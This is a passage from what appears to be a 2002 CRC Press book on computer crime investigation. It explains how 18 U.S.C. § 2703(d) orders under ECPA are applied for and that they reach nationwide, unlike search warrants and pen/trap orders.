Cover art courtesy of Greg Kipper.
[…] As a practical
©2002 CRC Press LLC
matter, a one- to three-page factual summary of the investigation and the role that the records will serve in advancing the investigation usually satisfies this criterion. A more in-depth explanation may be necessary in particularly complex cases. A sample § 2703(d) application and order appears in Appendix B. Section 2703(d) orders are nationwide in scope, much like subpoenas. ECPA permits judges to enter § 2703(d) orders compelling providers to disclose information even if the judges do not sit in the district in which the information is stored. See 18 U.S.C. § 2703(d) (stating that “any court that is a court of competent jurisdiction described in [18 U.S.C.] section 3127(2)(A)” may issue a § 2703(d) order) (emphasis added); 18 U.S.C. § 3127(2)(A) (defining “court of competent jurisdiction” as “a district court of the United States (including a magistrate of such a court) or a United States Court of Appeals”). In contrast, the statutes and rules governing search warrants, Title III orders, and pen/ trap orders contain express geographical limitations. See Fed. R. Crim.